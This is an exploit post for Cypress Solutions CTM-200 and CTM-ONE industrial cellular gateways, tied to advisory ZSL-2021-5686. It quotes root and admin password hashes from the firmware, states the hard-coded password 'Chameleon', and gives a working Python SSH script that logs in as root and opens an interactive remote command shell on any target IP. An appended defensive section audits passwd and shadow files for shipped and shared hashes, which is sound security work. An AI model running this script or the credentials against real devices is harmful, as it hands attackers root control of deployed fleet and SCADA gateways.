Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)


HACK1949


# Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca

#!/usr/bin/env python3
#
#
# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
#
#
# Vendor: Cypress Solutions Inc.
# Product web page: https://www.cypress.bc.ca
# Affected version: CTM-ONE (1.3.6-latest)
#                   CTM-ONE (1.3.1)
#                   CTM-ONE (1.1.9)
#                   CTM200 (2.7.1.5659-latest)
#                   CTM200 (2.0.5.3356-184)
#
# Summary: CTM-200 is the industrial cellular wireless gateway for fixed
# and mobile applications. The CTM-200 is a Linux based platform powered
# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
# features make the CTM-200 ideal for mobile fleet applications or fixed
# site office and SCADA communications.
#
# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
# fixed applications. CTM-ONE is your next generation of gateway for fleet
# tracking and fixed sites.
#
# ======================================================================
# CTM-200
# /var/config/passwd:
# -------------------
# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# nobody:*:65534:65534:nobody:/var:/bin/false
# daemon:*:65534:65534:daemon:/var:/bin/false
#
# /var/config/advanced.ini:
# -------------------------
# 0
# 0
# Chameleon
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
#
#
# CTM-ONE
# /etc/shadow:
# ------------
# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
# daemon:*:16009:0:99999:7:::
# bin:*:16009:0:99999:7:::
# sys:*:16009:0:99999:7:::
# ftp:*:16009:0:99999:7:::
# nobody:*:16009:0:99999:7:::
# messagebus:!:16009:0:99999:7:::
# ======================================================================
# 
# Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials
# within their Linux distribution image. This weakness can lead to the
# exposure of resources or functionality to unintended actors, providing
# attackers with sensitive information including executing arbitrary code.
#
# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
#            GNU/Linux 2.6.32.25 (arm4tl)
#            lighttpd/1.4.39
#            BusyBox v1.24.1
#            BusyBox v1.15.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5686
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
#
#
# 21.09.2021
#

import sys
import paramiko

bnr='''
o ┌─┐┌┬┐┌─┐  ┌─┐  ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬  ┬   o
  │ │││││ ┬  ├─┤  ├┬┘│ ││ │ │ └─┐├─┤├┤ │  │
o └─┘┴ ┴└─┘  ┴ ┴  ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o
'''
print(bnr)

if len(sys.argv)<2:
    print('Put an IP.')
    sys.exit()

adrs=sys.argv[1]##
unme='root'#admin#
pwrd='Chameleon'##

rsh=paramiko.SSHClient()
rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
rsh.connect(adrs,username=unme,password=pwrd)

while 1:
    cmnd=input('# ')
    if cmnd=='exit':
        break
    stdin,stdout,stderr=rsh.exec_command(cmnd)
    stdin.close()
    print(str(stdout.read().decode()))
rsh.close()
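
For defenders, the account files quoted in the advisory header show what to look for in an unpacked firmware image: usable password hashes shipped in the image, one hash shared by several accounts, MD5-crypt, and a second UID 0 account. The audit below is an added example, not part of the original post or the advisory; the function name `audit_accounts` and the sample entries with placeholder hashes are constructed for illustration.

```python
from collections import defaultdict

def _has_hash(field):
    """True when the password field holds a usable hash (not x, *, or !-locked)."""
    return field not in ("", "x") and field[0] not in "!*"

def audit_accounts(text):
    """Audit passwd- or shadow-format text; return sorted (account, issue) pairs."""
    hashes, uid0 = {}, []
    for line in text.splitlines():
        f = line.strip().split(":")
        if len(f) < 2 or f[0].startswith("#"):
            continue  # blank, malformed or commented-out line
        if _has_hash(f[1]):
            hashes[f[0]] = f[1]
        if len(f) == 7 and f[2] == "0":  # only the passwd layout carries a UID
            uid0.append(f[0])
    findings, by_hash = set(), defaultdict(list)
    for name, h in hashes.items():
        by_hash[h].append(name)
        findings.add((name, "password hash shipped in image"))
        if h.startswith("$1$"):
            findings.add((name, "MD5-crypt hash"))
    for names in by_hash.values():
        if len(names) > 1:
            findings.update((n, "hash shared with another account") for n in names)
    findings.update((n, "extra UID 0 account") for n in uid0 if n != "root")
    return sorted(findings)

# Constructed samples in the layout of the files quoted above; the hash
# strings and the "svc" account are placeholders, not values from the advisory.
SAMPLE_PASSWD = """\
root:$1$AAAAAAAA$PLACEHOLDERHASH0000001:0:0:root:/root:/bin/ash
admin:$1$AAAAAAAA$PLACEHOLDERHASH0000001:0:0:root:/root:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
"""
SAMPLE_SHADOW = """\
admin:$6$BBBBBBBB$PLACEHOLDERHASH0000002:17689:0:99999:7:::
root:$6$CCCCCCCC$PLACEHOLDERHASH0000003:17689:0:99999:7:::
svc:!$6$DDDDDDDD$PLACEHOLDERHASH0000004:17689:0:99999:7:::
daemon:*:16009:0:99999:7:::
"""

if __name__ == "__main__":
    for label, text in (("passwd", SAMPLE_PASSWD), ("shadow", SAMPLE_SHADOW)):
        for account, issue in audit_accounts(text):
            print(f"{label}: {account}: {issue}")
```

Any finding on a production image means the credential is identical on every unit running that firmware, so it should be replaced with a per-device secret set at provisioning or first boot.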
            